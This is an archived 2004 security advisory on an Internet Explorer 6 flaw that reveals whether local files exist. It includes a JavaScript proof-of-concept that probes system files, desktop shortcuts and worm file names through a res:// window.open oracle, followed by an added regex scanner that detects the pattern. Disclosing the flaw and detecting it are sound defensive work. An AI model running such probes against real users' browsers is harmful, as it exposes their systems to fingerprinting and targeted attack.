msieLocalFile.txt

10 Nov 2004 | Reported by Benjamin Tobias Franz | Type: packetstorm | Source: packetstormsecurity.com

Microsoft Internet Explorer can expose local file existence, risking targeted attacks against users.

`Microsoft Internet Explorer allows checking for the existence of local files  
  
  
Description:  
There is a security bug in Microsoft Internet Explorer that allows checking  
for the existence of local files in system directories (Root (C:/),  
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).  
Successful exploitation allows the author of a malicious web site to plan  
attacks against the target computer.  
The bug occurs because Microsoft Internet Explorer does not open a window  
if the target file exists, but it does open a window if the file does not  
exist.  
An attacker can also use this "feature" to verify the existence of local files  
(e.g. system files, malware files, shortcuts on Desktop, ...).  
  
Affected software:  
Microsoft Internet Explorer  
  
Workaround:  
Deactivate "Active Scripting" in the IE options menu.  
  
Proof-of-Concept exploit:  
  
<textarea id="btft" rows="10" cols="75"></textarea><br>  
<input type="text" id="btfn" value="iexplore.exe">  
<input type="button" value="> Search >"  
onClick="alert('File '+btfc(document.all.btfn.value));">  
  
<script>  
  
// Copyright (C) 2004 by Benjamin Tobias Franz ([email protected])  
//  
// Search for files with known names in following directories:  
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,  
// Internet Explorer  
  
function btfc(btfp){  
// Oracle: if window.open() throws, no window was opened and the file is reported as existing.  
var btfe=0,btfp;  
try{window.open("res://"+btfp,"_search");}  
catch(e){btfe=1;}  
if(btfe==1)return "'"+btfp+"' exists!\n";  
else return "'"+btfp+"' does NOT exist!\n";}  
  
var btfd="",btfv="BTF-AntiVirus: Search for '";  
btfd+="Search for system files ...\n";  
btfd+=btfc("autoexec.bat");  
btfd+=btfc("msdos.sys");  
btfd+=btfc("twain.dll");  
btfd+=btfc("swflash.ocx");  
btfd+=btfc("shell32.dll");  
btfd+=btfc("test.txt");  
btfd+=btfc("test.btf");  
btfd+="\nSearch for shortcut files (on desktop) ...\n";  
btfd+=btfc("Microsoft Word.lnk");  
btfd+=btfc("IrfanView.lnk");  
btfd+=btfc("Opera.lnk");  
btfd+=btfc("Mozilla.lnk");  
btfd+=btfc("Netscape 6.lnk");  
btfd+=btfc("Netscape 7.lnk");  
btfd+=btfc("btf.lnk");  
btfd+="\nSearch for virus/worm files ...\n";  
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");  
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");  
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");  
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");  
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");  
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");  
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");  
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");  
btfd+=btfv+"Klez' : "+btfc("wqk.exe");  
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");  
btfd+=btfv+"Maldal' : "+btfc("win.exe");  
btfd+=btfv+"Gokar' : "+btfc("karen.exe");  
  
// ...  
  
document.all.btft.value=  
"Copyright (C) 2004 by Benjamin Tobias Franz ([email protected])\n\n"+  
btfd;  
</script>  
  
  
Date of discovery:  
06. November 2004  
  
  
Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all  
patches installed on Windows 98.  
  
  
My DLL versions:  
  
MSHTML.DLL: 6.00.2800.1477  
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)  
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)  
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)  
URLMON.DLL: 6.00.2800.1475  
WININET.DLL: 6.00.2800.1475  
  
  
Regards,  
Benjamin Tobias Franz  
Germany  
  
`
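A content-inspection check for the pattern used in the proof-of-concept above, as an added example that is not part of the original advisory: it flags page source that passes a `res://` URL to `window.open()` and lists the file names handed to the enclosing helper. The function names, the threshold of three targets and both sample pages are assumptions made for illustration.

```javascript
// Added example: heuristic static scan for the res:// window.open() probe pattern.
// Regex-based, so it only catches the plain form shown in the advisory.

const SINK_RE = /window\s*\.\s*open\s*\(\s*["']res:\/\//gi;
const FUNC_RE = /function\s+([A-Za-z_$][\w$]*)\s*\(/g;

// Name of the last function declared before `index` (assumed to enclose the sink).
function enclosingFunction(source, index) {
  let name = null;
  for (const m of source.matchAll(FUNC_RE)) {
    if (m.index > index) break;
    name = m[1];
  }
  return name;
}

// String literals passed to `name(...)`: the file names the page probes for.
function literalArgs(source, name) {
  const safe = name.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const callRe = new RegExp("(?<![\\w$])" + safe + "\\s*\\(\\s*([\"'])(.*?)\\1\\s*\\)", "g");
  return [...new Set([...source.matchAll(callRe)].map((m) => m[2].trim()))];
}

// Classify a page: "clean", "res-open" (sink only) or "file-probe" (sink + many targets).
function scanPage(source, threshold = 3) {
  const sinks = [...source.matchAll(SINK_RE)];
  if (sinks.length === 0) return { verdict: "clean", wrappers: [], targets: [] };
  const wrappers = [...new Set(sinks.map((s) => enclosingFunction(source, s.index)).filter(Boolean))];
  const targets = [...new Set(wrappers.flatMap((w) => literalArgs(source, w)))];
  const verdict = targets.length >= threshold ? "file-probe" : "res-open";
  return { verdict, wrappers, targets };
}

// Constructed sample pages (not captured traffic); the helper name `chk` is hypothetical.
const SAMPLE_PROBE = `<script>
function chk(p){try{window.open("res://"+p,"_search");}catch(e){return 1;}return 0;}
var r = chk("a.dll") + chk("b.exe") + chk("c.lnk") + chk("a.dll");
</script>`;
const SAMPLE_BENIGN = `<script>
function help(){ window.open("https://example.com/help", "_blank"); }
</script>`;

console.log(scanPage(SAMPLE_PROBE));
console.log(scanPage(SAMPLE_BENIGN).verdict);
```

A hit is a reason to review the page, not proof of intent; script that builds the URL or the call dynamically will not match these patterns.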
